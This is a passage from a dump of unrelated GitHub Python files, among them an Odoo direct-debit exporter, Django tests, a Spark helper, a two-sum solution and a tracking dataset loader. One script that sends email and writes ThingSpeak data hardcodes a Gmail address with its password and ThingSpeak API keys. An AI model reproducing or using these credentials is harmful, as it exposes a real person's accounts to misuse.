Artist.query.get(id)\n db.session.delete(artist)\n db.session.commit()\n status = True\n except:\n db.session.rollback()\n finally:\n db.session.close()\n return status\n","repo_name":"Azees12/Udacity","sub_path":"Project 1 (Fyyur)/models/Artist.py","file_name":"Artist.py","file_ext":"py","file_size_in_byte":5055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38724808069","text":"# -*- coding: utf-8 -*-\n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).\n\nfrom odoo import api, fields, models\nfrom odoo.exceptions import ValidationError, UserError\nfrom odoo.tools.translate import _\n\nimport re\nimport datetime\nfrom pandas.tseries.offsets import BDay\nimport base64\nfrom uuid import uuid4\nimport logging\n_logger = logging.getLogger(__name__)\n\n\nclass ExportDirectDebitWizard(models.TransientModel):\n _inherit = 'export.direct.debit.wizard'\n _description = \"export.direct.debit.wizard\"\n\n def file_save(self):\n res = super(ExportDirectDebitWizard, self).file_save()\n if self.payment_acquirer_id.provider == 'rlpagar': # Debitos Red Link Pagar\n self.red_link_pagar_refresh_file_generator()\n return res\n\n def red_link_pagar_refresh_file_generator(self):\n # Registro Datos\n registry = {}\n total = 0.0\n count = 0\n\n for invoice_id in self._context['active_ids']:\n invoice = self.env['account.move'].search(\n [('id', '=', invoice_id)])\n\n if invoice.state == 'posted' and invoice.partner_id.customer_payment_mode_id == self.payment_mode_id:\n if not invoice.partner_id.vat:\n raise UserError(\"Error: El cliente %s de la factura %s no tiene DNI o CUIT asociado!!!\" % (\n invoice.partner_id.name, invoice.name))\n vat_number = invoice.partner_id.vat\n if vat_number not in registry:\n registry[vat_number] = {}\n\n registry[vat_number]['%s' % (invoice_id)] = {\n 'amount_residual': invoice.amount_residual,\n 'currency_id': invoice.currency_id.id,\n 'imputation_date': self.file_date + BDay(self.imputation_business_days),\n 'document_number': invoice.l10n_latam_document_number,\n 'vat': \"0\" if not invoice.partner_id.vat else invoice.partner_id.vat,\n 'partner_id': invoice.partner_id.id,\n 'partner_name': invoice.partner_id.name,\n 'partner_country_id': invoice.partner_id.country_id.id,\n 'partner_ref': invoice.partner_id.ref,\n 'company_name': self.env.user.company_id.name,\n 'date': self.file_date,\n }\n\n refresh_initial_registry = ''\n # Refresh Registro Inicial\n # 1 - Identificación del registro - tipo: alfanumérico - long.: 13 - decimales: 0\n refresh_initial_registry += \"HRFACTURACION\"[:13]\n # 2 - Código de Ente - tipo: alfanumérico - long.: 3 - decimales: 0\n refresh_initial_registry += self.payment_acquirer_id.red_link_company[:3]\n # 3 - Fecha de Proceso - tipo: numérico - long.: 6 - decimales: 0\n refresh_initial_registry += self.file_date.strftime(\"%y%m%d\")[:6]\n # 4 - Lote - tipo: numérico - long.: 5 - decimales: 0\n refresh_initial_registry += str(self.file_number).rjust(5, \"0\")[:5]\n # 5 - Filler - tipo: alfanumérico - long.: 104 - decimales: 0\n refresh_initial_registry += ' '.ljust(104, \" \")[:104]\n refresh_initial_registry += \"\\r\\n\"\n\n refresh_data_registry = ''\n\n # Refresh Registro de Datos\n for vat_number in registry:\n total_registry = 0.0\n invoice_ids = []\n\n for invoice in registry[vat_number]:\n invoice_ids.append(invoice)\n total_registry = total_registry + \\\n registry[vat_number][invoice]['amount_residual']\n\n # Paymen Transaction\n payment_transaction = 
self.env['payment.transaction']\n values = {\n 'amount': total_registry,\n 'acquirer_id': self.payment_acquirer_id.id,\n 'acquirer_reference': vat_number,\n 'currency_id': registry[vat_number][invoice]['currency_id'],\n 'reference': str(uuid4()),\n 'partner_id': registry[vat_number][invoice]['partner_id'],\n 'partner_country_id': registry[vat_number][invoice]['partner_country_id'],\n 'invoice_ids': [(6, 0, invoice_ids)],\n 'state': 'pending',\n }\n pt = payment_transaction.create(values)\n\n total = total + total_registry\n count += 1\n # 1 - Identificador de Deuda - tipo: numérico - long.: 5 - decimales: 0\n refresh_data_registry += '0' + self.file_date.strftime(\"%m%y\")[:4]\n # 2 - Identificador de Concepto - tipo: numérico - long.: 3 - decimales: 0\n refresh_data_registry += '1'.rjust(3, \"0\")[:3]\n # 3 - Identificador de usuario - tipo: numérico - long.: 19 - decimales: 0\n vat = re.sub('[^0-9]+', '', registry[vat_number][invoice]['vat'])\n refresh_data_registry += vat.rjust(11, \"0\").ljust(19, \" \")[:19]\n # 4 - Fecha primer venc. - tipo: numérico - long.: 6 - decimales: 0\n refresh_data_registry += (self.file_date + BDay(\n self.imputation_business_days)).strftime(\"%y%m%d\")[:6]\n # 5 - Importe primer venc. - tipo: numérico - long.: 12 - decimales: 2\n refresh_data_registry += str(int(round(total_registry, 3)\n * 100)).rjust(12, \"0\")[:12]\n # 6 - Fecha segundo venc. - tipo: numérico - long.: 6 - decimales: 0\n refresh_data_registry += \"0\".rjust(6, \"0\")[:6]\n # 7 - Importe segundo venc. - tipo: numérico - long.: 12 - decimales: 2\n refresh_data_registry += \"0\".rjust(12, \"0\")[:12]\n # 8 - Fecha tercer venc. - tipo: numérico - long.: 6 - decimales: 0\n refresh_data_registry += \"0\".rjust(6, \"0\")[:6]\n # 9 - Importe tercer venc. - tipo: numérico - long.: 12 - decimales: 2\n refresh_data_registry += \"0\".rjust(12, \"0\")[:12]\n # 10 - Discrecional - tipo: alfanumérico - long.: 50 - decimales: 0\n refresh_data_registry += \" \".rjust(50, \" \")[:50]\n refresh_data_registry += \"\\r\\n\"\n\n refresh_final_registry = ''\n # Refresh Registro Final\n # 1 - Identificación del registro - tipo: alfanumérico - long.: 13 - decimales: 0\n refresh_final_registry += \"TRFACTURACION\"[:13]\n # 2 - Cantidad de registros - tipo: numérico - long.: 8 - decimales: 0\n refresh_final_registry += str(count + 2).rjust(8, \"0\")[:8]\n # 3 - Total primer venc. - tipo: numérico - long.: 16 - decimales: 2\n refresh_final_registry += str(int(round(total, 3)\n * 100)).rjust(18, \"0\")[:18]\n # 4 - Total segundo venc. - tipo: numérico - long.: 16 - decimales: 2\n refresh_final_registry += \"0\".rjust(18, \"0\")[:18]\n # 5 - Total tercer venc. 
- tipo: numérico - long.: 16 - decimales: 2\n refresh_final_registry += \"0\".rjust(18, \"0\")[:18]\n # 6 - Filler - tipo: alfanumérico - long.: 56 - decimales: 0\n refresh_final_registry += ' '.ljust(56, \" \")[:56]\n refresh_final_registry += \"\\r\\n\"\n\n # Direct Debit File\n direct_debit_file = self.env['direct.debit.file']\n month = f'{int(self.file_date.strftime(\"%m\")):x}'\n filename = \"P\" + self.payment_acquirer_id.red_link_company[:3] + str(\n self.file_number) + month.upper() + self.file_date.strftime(\"%d\") + '.txt'\n\n # Control Registro Inicial\n control_initial_registry = ''\n # 1 - Identificación del registro - tipo: alfanumérico - long.: 9 - decimales: 0\n control_initial_registry += \"HRPASCTRL\"[:9]\n # 2 - Fecha de Generación - tipo: numérico - long.: 8 - decimales: 0\n control_initial_registry += self.file_date.strftime(\"%Y%m%d\")[:8]\n # 3 - Código de Ente - tipo: alfanumérico - long.: 3 - decimales: 0\n control_initial_registry += self.payment_acquirer_id.red_link_company[:3]\n # 4 - Nombre Archivo - tipo: alfanumérico - long.: 8 - decimales: 0\n control_initial_registry += filename[:8]\n # 5 - Longitud del Archivo - tipo: numérico - long.: 8 - decimales: 0\n control_initial_registry += str(\n len(refresh_initial_registry+refresh_data_registry+refresh_final_registry)).rjust(10, \"0\")[:10]\n # 6 - Filler - tipo: alfanumérico - long.: 56 - decimales: 0\n control_initial_registry += ' '.ljust(37, \" \")[:37]\n control_initial_registry += \"\\r\\n\"\n\n # Control Registro Datos\n control_data_registry = ''\n # 1 - Identificación de datos - tipo: alfanumérico - long.: 5 - decimales: 0\n control_data_registry += \"LOTES\"[:5]\n # 2 - Lote - tipo: numérico - long.: 5 - decimales: 0\n control_data_registry += str(self.file_number).rjust(5, \"0\")[:5]\n # 3 - Cantidad de registros del Lote - tipo: numérico - long.: 8 - decimales: 0\n control_data_registry += str(count + 2).rjust(8, \"0\")[:8]\n # 4 - Importe primer vencimiento - tipo: numérico - long.: 18 - decimales: 2\n control_data_registry += str(int(round(total, 3)\n * 100)).rjust(18, \"0\")[:18]\n # 5 - Importe segundo vencimiento - tipo: numérico - long.: 18 - decimales: 2\n control_data_registry += \"0\".rjust(18, \"0\")[:18]\n # 6 - Importe tercer vencimiento - tipo: numérico - long.: 18 - decimales: 2\n control_data_registry += \"0\".rjust(18, \"0\")[:18]\n # 7 - Filler - tipo: alfanumérico - long.: 3 - decimales: 0\n control_data_registry += ' '.ljust(3, \" \")[:3]\n control_data_registry += \"\\r\\n\"\n\n # Control Registro Final\n control_final_registry = ''\n # 1 - Identificación de fin - tipo: alfanumérico - long.: 5 - decimales: 0\n control_final_registry += \"FINAL\"[:5]\n # 2 - Cantidad total de registros - tipo: numérico - long.: 8 - decimales: 0\n control_final_registry += str(count + 2).rjust(8, \"0\")[:8]\n # 3 - Importe primer vencimiento - tipo: numérico - long.: 18 - decimales: 2\n control_final_registry += str(int(round(total, 3)\n * 100)).rjust(18, \"0\")[:18]\n # 4 - Importe segundo vencimiento - tipo: numérico - long.: 18 - decimales: 2\n control_final_registry += \"0\".rjust(18, \"0\")[:18]\n # 5 - Importe tercer vencimiento - tipo: numérico - long.: 18 - decimales: 2\n control_final_registry += \"0\".rjust(18, \"0\")[:18]\n # 6 - Fecha último vencimiento - tipo: alfanumérico - long.: 8 - decimales: 0\n control_final_registry += (self.file_date + BDay(self.imputation_business_days)).strftime(\"%Y%m%d\")[:8] \n control_final_registry += \"\\r\\n\"\n \n control_filename = \"C\" + 
self.payment_acquirer_id.red_link_company[:3] + str(\n            self.file_number) + month.upper() + self.file_date.strftime(\"%d\") + '.txt'\n        \n        values = {\n            'name': filename,\n            'control_file_name': control_filename,\n            'date': self.file_date,\n            'next_business_days': self.imputation_business_days,\n            'count': count,\n            'total': total,\n            'file': base64.b64encode(\"\\n\".join([refresh_initial_registry + refresh_data_registry + refresh_final_registry]).encode('ascii', errors='ignore')),\n            'control_file': base64.b64encode(\"\\n\".join([control_initial_registry + control_data_registry + control_final_registry]).encode('ascii', errors='ignore')),\n            'payment_acquirer_id': self.payment_acquirer_id.id,\n            'description': self.payment_mode_id.name + ' ' + filename + ' ' + self.file_date.strftime('%d/%m/%Y'),\n        }\n        ddf = direct_debit_file.create(values)\n","repo_name":"vangrow/account-modules","sub_path":"payment_pagar_link/wizard/red_link_export_pagar_debit_wizard.py","file_name":"red_link_export_pagar_debit_wizard.py","file_ext":"py","file_size_in_byte":11772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"23598109492","text":"from django.test import TestCase\nfrom .models import Category, Product\n\n\nclass TestProductModels(TestCase):\n    \"\"\" Test product app models \"\"\"\n\n    def setUp(self):\n        \"\"\" Create test record \"\"\"\n        self.category = Category.objects.create(\n            name='test',\n            friendly_name='Test'\n        )\n        self.product = Product.objects.create(\n            name='Test Product',\n            description='test',\n            has_sizes='True',\n            price='100',\n        )\n\n    def test_category_string(self):\n        \"\"\" Test Category string method \"\"\"\n        self.assertEqual(str(self.category), 'test')\n\n    def test_category_friendly(self):\n        \"\"\" Test Category friendly method \"\"\"\n        self.assertEqual(str(self.category.friendly_name), 'Test')\n\n    def test_product_string(self):\n        \"\"\" Test Product string method \"\"\"\n        self.assertEqual(str(self.product), 'Test Product')\n","repo_name":"anyahush/surf-the-wave","sub_path":"products/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"44887953235","text":"file_path = 'source/recipes.txt'\n\n# Task 1. Building the dictionary from the file.\ndef dictionary(file_path):\n    cook_book = {}\n    with open(file_path, encoding='utf-8') as f:\n        for i in f:\n            dish_name = i.lower().strip()\n            portion = int(f.readline())\n            ingredients = []\n\n            for item in range(portion):\n                ingredient_name, quantity, measure = f.readline().lower().strip().split(\"| \")\n                ingr_dict = {\n                    'ingredient_name': ingredient_name,\n                    'quantity': quantity,\n                    'measure': measure\n                }\n                ingredients.append(ingr_dict)\n\n            f.readline()\n            cook_book[dish_name] = ingredients\n\n    return cook_book\n\n\n# Task 2. Getting a dictionary of ingredient names and their quantities for the dishes.\ndef get_shop_list(dishes, person_count, cook_book):\n    shop_list = {}\n    for dish in dishes:\n        ingredients = cook_book.get(dish.lower())\n        if ingredients:\n            for ingredient in ingredients:\n                name = ingredient['ingredient_name']\n                quantity = int(ingredient['quantity']) * person_count\n                measure = ingredient['measure']\n                if name in shop_list:\n                    shop_list[name]['quantity'] += quantity\n                else:\n                    shop_list[name] = {'measure': measure, 'quantity': quantity}\n\n    return shop_list\n\n# Task 3. Working with files.\ndef read_file_content(file_path):\n    with open(file_path, encoding='utf-8') as f:\n        lines = f.readlines()\n\n    return len(lines), \"\".join(lines)\n","repo_name":"Saniu6ka/File","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"73204999186","text":"#######################################################################################################################################\n# File Name: ContextProvider.py\n# Author: Ashish Tyagi\n# Date created: March 17, 2017\n# Date last modified: March 20, 2017\n# Python Version: 2.7\n# Description: Creates or reuses the spark context, SQL context \n#######################################################################################################################################\n\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.sql import SQLContext\n\nsparkContext = None\nsqlContext = None\nsparkStreamingContext = None\n\n# Creates a spark context if not exists already\ndef getSparkInstance():\n    global sparkContext\n    if sparkContext == None:\n        # Create Spark Context\n        conf = SparkConf().setAppName(\"Spark Stats Job\")\n        # for local mode use following \n        #.setMaster(ExecutionMode).set(\"spark.executor.instances\", 3).set(\"spark.local.ip\", \"127.0.0.1\")\n        sparkContext = SparkContext(conf=conf)\n    return sparkContext\n\n# Checks if spark context is present if not creates it and then creates or reuses the SQL context\ndef getSQLContext():\n    global sparkContext\n    global sqlContext\n    if sparkContext == None:\n        getSparkInstance()\n    if sqlContext == None:\n        sqlContext = SQLContext(sparkContext)\n    return sqlContext\n","repo_name":"ashishtyagicse/SparkSASStatFunctions","sub_path":"utils/ContextProvider.py","file_name":"ContextProvider.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"15247881489","text":"import copy\nfrom pprint import pprint\n\ndef _convert_tf(d, includes=[0]):\n    for key in d.keys():\n        x = d[key]\n        if not x in includes:\n            d[key] = False\n        else:\n            d[key] = True\n    \n    return d\ndef _get_around(matrix, row, col):\n    \n    build = {1:None, 2:None, 3:None, 4:None}\n    \n    WIDTH = len(matrix[0])\n    HEIGHT = len(matrix)\n    \n    if not row == 0:\n        build[1] = matrix[row - 1][col]\n    if not row == HEIGHT - 1:\n        build[4] = matrix[row + 1][col]\n    if not col == 0:\n        build[2] = matrix[row][col - 1]\n    if not col == WIDTH - 1:\n        build[3] = matrix[row][col + 1]\n    \n    return build\n\n\ndef genColMask(mat, edge_col_tiles=[0], ignore_tiles=[0]):\n    build = copy.deepcopy(mat)\n    access = copy.deepcopy(mat)\n    hreps = 0\n    lreps = 0\n    for row in access:\n        for item in row:\n            #print(hreps, lreps)\n            if not item in ignore_tiles: #don't run it on air or whatever\n                around = _get_around(access, hreps, lreps)\n                #print(\"Around: \" + str(around))\n                tf = _convert_tf(around, includes=edge_col_tiles)\n                build[hreps][lreps] = tf\n                #print(\"TF: \" + str(tf))\n                #print(tf, hreps, lreps)\n            else:\n                build[hreps][lreps] = {1: False, 2: False, 3: False, 4: False}\n            lreps += 1\n        lreps = 0\n        hreps += 1\n    return build\n\nif __name__ == '__main__':\n    mat = [\n        [0, 0, 0],\n        [0, 1, 0],\n        [1, 1, 1]\n    ]\n    a = genColMask(mat)\n    \n    for row in a:\n        
print(row)\n","repo_name":"enbyte/pytile","sub_path":"mask_col.py","file_name":"mask_col.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36715579820","text":"import smtplib \r\nfrom email.message import EmailMessage\r\nimport xlrd\r\nfrom xlrd import open_workbook\r\nimport os\r\nimport re\r\nimport requests\r\nimport serial\r\n\r\n\r\n\r\nclass Justmail:\r\n def __init__(self):\r\n pass\r\n \r\n\r\n def mail(self,message=None):\r\n \r\n msg = EmailMessage()\r\n \r\n user_from=input(\"sender mailid\\n\")\r\n user_to=input(\"receiver mail.id\\n\")\r\n user_sub=input(\"message subject\\n\")\r\n if not message:\r\n user_message=input(\"write the message\\n\")\r\n else:\r\n user_message = message\r\n\r\n msg['From'] = user_from\r\n msg['To'] = user_to\r\n msg['Subject'] =user_sub \r\n msg.set_content(user_message)\r\n # Send the message via our own SMTP server.\r\n print(\"\\nAre you sure you want to send this mail? (yes/no) \")\r\n user_inputyesorno = input()\r\n \r\n if user_inputyesorno ==\"no\" or user_inputyesorno ==\"NO\":\r\n print(\"\\n processing mail has been cancelled\")\r\n return\r\n elif user_inputyesorno == \"yes\" or user_inputyesorno == \"YES\": \r\n print(\"\\n_________________________\")\r\n \r\n try:\r\n \r\n server = smtplib.SMTP_SSL('smtp.gmail.com',465)\r\n server.login(\"sunithareynold@gmail.com\", \"dolly@doss123\")\r\n server.send_message(msg)\r\n server.quit()\r\n print(\"\\nEmail sent successfully.\")\r\n\r\n except Exception as e:\r\n print(e)\r\n pass \r\n\r\n\r\n def thingspeak(self):\r\n \r\n light_fan_status={\"ON\":1,\"OFF\":0}\r\n read_payload = {'results':2}\r\n read_url = \"https://api.thingspeak.com/channels/1098917/feeds.json?api_key=OQY7RQXDXMC51232&results=2\"\r\n \r\n try:\r\n response = requests.get(read_url)\r\n result = response.json()\r\n feeds = result['feeds']\r\n for i in feeds:\r\n print(\"light=\",i['field1'],\"fan=\",i['field2'],\"fan_speed=\",i['field3'],\"temperature=\",i['field4'])\r\n except Exception as e:\r\n print(e)\r\n \r\n light=input(\"write the light status(on or off) value into the thingspeak\")\r\n light_switch=light_fan_status.get(light.upper(),0)\r\n fan=input(\"write the fan status(on or off) value into the thingspeak\")\r\n fan_switch=light_fan_status.get(fan.upper(),0)\r\n fan_speed=input(\"write the fan speed value into the thingspeak\")\r\n temperature=input(\"write the temperature value into the thingspeak\")\r\n\r\n \r\n write_payload = {'api_key':\"6OZ715PMNAC6MRWN\",'field1':light_switch,'field2':fan_switch,'field3':fan_speed,'field4':temperature}\r\n write_url = \"https://api.thingspeak.com/update?api_key=6OZ715PMNAC6MRWN&field1=0\"\r\n\r\n try:\r\n response = requests.get(write_url,params=write_payload)\r\n print(response.json())\r\n except Exception as e:\r\n print(e) \r\n\r\n return {\"light\":light,\r\n \"fan\":fan,\r\n \"fan_speed\":fan_speed,\r\n \"temperature\":temperature}\r\n\r\n\r\n def serial_port(self,ts_reading):\r\n serialPort =serial.Serial(port = \"COM3\", baudrate=9600,bytesize=8, timeout=2, stopbits=serial.STOPBITS_ONE)\r\n CurrentDataPacket=\"bluetooth is working\"\r\n print(serialPort.write(str.encode(CurrentDataPacket))) # GETTING OUTPUT FROM THE SERIAL PORT.\r\n str_readings = \"\"\r\n for k,val in ts_reading.items():\r\n str_readings += k + \" - \" + str(val)+\"\\n\"\r\n print(serialPort.write(str.encode(str_readings)))\r\n return 
str_readings\r\n\r\n\r\nobj=Justmail()\r\nobj.mail()\r\nts_reading=obj.thingspeak()\r\nsr_reading=obj.serial_port(ts_reading)\r\nprint(\"sr_reading:\",sr_reading)\r\n \r\nobj.mail(message=sr_reading)\r\n\r\n\r\n\r\n","repo_name":"sunitha-rs/custom_codes","sub_path":"mail1_thing1_serial1.py","file_name":"mail1_thing1_serial1.py","file_ext":"py","file_size_in_byte":3812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24448485885","text":"\"\"\"Console script for check_my_certs.\"\"\"\nimport sys\nimport click\nfrom .check_my_certs import check\n\n\n@click.command()\n@click.option(\n \"-f\",\n \"--filename\",\n default=\"sites.txt\",\n help=\"File listing sites to check.\",\n show_default=True,\n)\n@click.option(\n \"-d\",\n \"--days\",\n default=14,\n help=\"Days until expiry for warning.\",\n show_default=True,\n)\ndef main(filename, days):\n \"\"\"Console script for check_my_certs.\"\"\"\n check(filename, days)\n return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(main()) # pragma: no cover\n","repo_name":"bac/check-my-certs","sub_path":"check_my_certs/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31443341227","text":"# Given an array of integers, return indices of the two numbers such that they add up to a specific target.\n#\n# You may assume that each input would have exactly one solution, and you may not use the same element twice.\n#\n# Example:\n#\n# Given nums = [2, 7, 11, 15], target = 9,\n#\n# Because nums[0] + nums[1] = 2 + 7 = 9,\n# return [0, 1].\n\n\n# def find_target_sum_indexes(arr: [int], target: int) -> [int]:\n# ht = {}\n# for i in range(len(arr)):\n# if target - arr[i] in ht:\n# return [i, ht[target - arr[i]]]\n# ht[arr[i]] = i\n# return []\n#\n#\n# class Solution:\n# def twoSum(self, nums: [int], target: int) -> [int]:\n# return find_target_sum_indexes(nums, target)\n\n# two-pointer\n# def twoSum(self, nums, target):\n# nums = enumerate(nums)\n# nums = sorted(nums, key=lambda x:x[1])\n# l, r = 0, len(nums)-1\n# while l < r:\n# if nums[l][1]+nums[r][1] == target:\n# return sorted([nums[l][0]+1, nums[r][0]+1])\n# elif nums[l][1]+nums[r][1] < target:\n# l += 1\n# else:\n# r -= 1\n\nclass Solution:\n def twoSum(self, nums: [int], target: int) -> [int]:\n hm: {int: int} = {}\n for i, n in enumerate(nums):\n if target - n in hm:\n return [hm[target - n], i]\n hm[n] = i\n return []\n\n\nif __name__ == '__main__':\n print(Solution().twoSum([2, 7, 11, 15], 9))\n # print(find_target_sum_indexes([2, 7, 11, 15], 9))\n","repo_name":"ruan65/python_algorithms_and_problem_solving","sub_path":"leetcode/hash_tables/a_1_two_sum.py","file_name":"a_1_two_sum.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19884502761","text":"import numpy as np\nfrom pytracking.evaluation.data import Sequence, BaseDataset, SequenceList\nimport os\nimport glob\nimport pdb\n\ndef PTBTIRDataset():\n return PTBTIRDatasetClass().get_sequence_list()\n\n\nclass PTBTIRDatasetClass(BaseDataset):\n \"\"\"VOTRGBT2018 dataset\n\n Publication:\n The sixth Visual Object Tracking VOTRGBT2018 challenge results.\n Matej Kristan, Ales Leonardis, Jiri Matas, Michael Felsberg, Roman Pfugfelder, Luka Cehovin Zajc, Tomas Vojir,\n Goutam Bhat, Alan Lukezic et al.\n ECCV, 2018\n https://prints.vicos.si/publications/365\n\n 
Download the dataset from http://www.votchallenge.net/vot2019rgbt/dataset.html\"\"\"\n def __init__(self):\n super().__init__()\n self.base_path = self.env_settings.ptbtir_path\n self.sequence_list = self._get_sequence_list()\n\n def get_sequence_list(self):\n return SequenceList([self._construct_sequence(s) for s in self.sequence_list])\n\n def _construct_sequence(self, sequence_name):\n sequence_path = sequence_name \n anno_path = '{}/{}/groundtruth_rect.txt'.format(self.base_path, sequence_name)\n try:\n ground_truth_rect = np.loadtxt(str(anno_path), dtype=np.float64)\n except:\n ground_truth_rect = np.loadtxt(str(anno_path), delimiter=',', dtype=np.float64)\n\n end_frame = ground_truth_rect.shape[0]\n\n img_dir = os.path.join(self.base_path, sequence_path, 'img') \n img_list = glob.glob(img_dir + \"/*.jpg\")\n img_list.sort()\n frames = [os.path.join(img_dir, x) for x in img_list] \n\n# return Sequence(sequence_name, framesv, ground_truth_rect)\n return Sequence(sequence_name, frames, 'PTBTIR', ground_truth_rect)\n\n def __len__(self):\n return len(self.sequence_list)\n\n def _get_sequence_list(self):\n sequence_list= [\n 'airplane',\n 'birds',\n 'campus1',\n 'campus2',\n 'circle1',\n 'circle2',\n 'classroom1',\n 'classroom2',\n 'classroom3',\n 'conversation',\n 'crossing',\n 'crossroad1',\n 'crossroad2',\n 'crouching',\n 'crowd1',\n 'crowd2',\n 'crowd3',\n 'crowd4',\n 'distractor1',\n 'distractor2',\n 'fighting',\n 'hiding',\n 'jacket',\n 'meetion1',\n 'meetion2',\n 'meetion3',\n 'meetion4',\n 'park1',\n 'park2',\n 'park3',\n 'park4',\n 'park5',\n 'patrol1',\n 'patrol2',\n 'phone1',\n 'phone2',\n 'phone3',\n 'road1',\n 'road2',\n 'road3',\n 'room1',\n 'room2',\n 'room3',\n 'sandbeach',\n 'saturated',\n 'school1',\n 'school2',\n 'sidewalk1',\n 'sidewalk2',\n 'sidewalk3',\n 'soldier',\n 'stranger1',\n 'stranger2',\n 'stranger3',\n 'street1',\n 'street2',\n 'street3',\n 'street4',\n 'street5',\n 'walking']\n return sequence_list\n","repo_name":"zhanglichao/cmdTIRtracking","sub_path":"cmdTIRtracking/pytracking/evaluation/ptbtirdataset.py","file_name":"ptbtirdataset.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"48"} +{"seq_id":"5757244154","text":"import sys\nimport math\nimport array as arr\n\nCOLOR_NONE = 0\n\n# ------------------------------\ndef calcRow( pos, maxCols ):\n return math.ceil(pos / maxCols)\n\n# ------------------------------\ndef calcCol( pos, maxCols ):\n mod = pos % maxCols\n if (mod == 0):\n return maxCols\n\n return pos % maxCols\n\n# ------------------------------\n# -1\n# ^\n# 1 2 3 4\n# ^\n# 5 6 7 8\n#\ndef goNorth( pos, maxCols ):\n if (1 == calcRow(pos, maxCols)):\n return -1\n\n return pos - maxCols\n\n# ------------------------------\ndef goEast( pos, maxCols ):\n if (maxCols == calcCol(pos, maxCols)):\n return -1\n\n return pos + 1\n\n# ------------------------------\ndef goSouth( pos, maxCols, maxRows ):\n if (maxRows == calcRow(pos, maxCols)):\n return -1\n\n return pos + maxCols\n\n# ------------------------------\ndef goWest( pos, maxCols ):\n if (1 == calcCol(pos, maxCols)):\n return -1\n\n return pos - 1\n\n# ------------------------------\ndef step(direction, pos, maxCols, maxRows):\n if (\"S\" == direction):\n return goSouth(pos, maxCols, maxRows)\n\n if (\"N\" == direction):\n return goNorth(pos, maxCols)\n\n if (\"E\" == direction):\n return goEast(pos, maxCols)\n\n if (\"W\" == direction):\n return goWest(pos, maxCols)\n\n# 
------------------------------\ndef isOutOfBounds( pos, maxCols, maxRows ) :\n return pos > maxCols * maxRows or pos < 1;\n\n# ------------------------------\ndef manhattanDinstance(p1, p2, maxCols):\n r1 = calcRow(p1, maxCols)\n c1 = calcCol(p1, maxCols)\n r2 = calcRow(p2, maxCols)\n c2 = calcCol(p2, maxCols)\n\n return abs(r1 - r2) + abs(c1 - c2)\n\n# -------------------------------\ndef initGrid(maxCols, maxRows):\n grid = []\n grid.append(0)\n\n for x in range(0, maxCols * maxRows):\n grid.append(COLOR_NONE)\n\n return grid\n\n# -------------------------------\n#\n# steps: [S, W, E, E]\n#\ndef getValidPath(pathDefinition, grid, colArg, rowArg, colorArg):\n\n color = pathDefinition[0]\n startPosArg = pathDefinition[1]\n pathLenArg = pathDefinition[2]\n\n path = []\n\n for y in range(0, pathLenArg):\n direction = pathDefinition[3+y]\n\n path.append(startPosArg)\n newPosition = step(direction, startPosArg, colArg, rowArg)\n \n if (newPosition == -1): # out of bounds\n return []\n\n if (newPosition in path): # crosses itself\n return []\n\n if (y == pathLenArg-1): # letzter schritt\n if (grid[newPosition] != colorArg):\n return []\n else:\n # andere farbe\n if (grid[newPosition] != colorArg and grid[newPosition] != COLOR_NONE):\n return []\n \n # grid[newPosition] = colorArg\n\n startPosArg = newPosition\n\n return path\n\n# ------------------------------\ndef addPathToGrid(grid, validPath, color):\n \n for x in validPath:\n grid[x] = color\n\n return grid\n\n# -------------------------------\ndef draw(grid, outputFile, colArg):\n\n for x in range(1, len(grid)):\n if grid[x] == COLOR_NONE:\n outputFile.write(' ')\n else:\n outputFile.write('X')\n\n if x % colArg == 0:\n outputFile.write('\\n') \n\n return 1\n\n# ------------------------------\n\ndef main(args, outputFile):\n argIdx = 0\n rowArg = int(args[argIdx])\n argIdx += 1\n colArg = int(args[argIdx])\n argIdx += 1\n\n grid = initGrid(colArg, rowArg)\n\n posCountArg = int(args[argIdx])\n argIdx += 1\n\n for x in range(0, posCountArg):\n posArg = int(args[argIdx])\n argIdx += 1\n\n colorArg = int(args[argIdx])\n argIdx += 1\n\n grid[posArg] = colorArg\n\n pathCountArg = int(args[argIdx])\n argIdx += 1\n\n for x in range(0, pathCountArg): # path arguments\n colorArg = int(args[argIdx])\n argIdx += 1\n\n startPosArg = int(args[argIdx])\n argIdx += 1\n\n pathLenArg = int(args[argIdx])\n argIdx += 1\n\n pathDefinition = [colorArg, startPosArg, pathLenArg]\n for y in range(0, pathLenArg):\n stepArg = args[argIdx]\n argIdx += 1\n\n pathDefinition.append(stepArg)\n \n validPath = getValidPath(pathDefinition, grid, colArg, rowArg, colorArg)\n grid = addPathToGrid(grid, validPath, colorArg)\n\n draw(grid, outputFile, colArg)","repo_name":"tomtomsen/catcoder-addictive-game","sub_path":"level4/level4.py","file_name":"level4.py","file_ext":"py","file_size_in_byte":4361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29874662424","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import m2m_changed\n\n# Create your models here.\n\nclass Message(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n content = models.TextField()\n created = 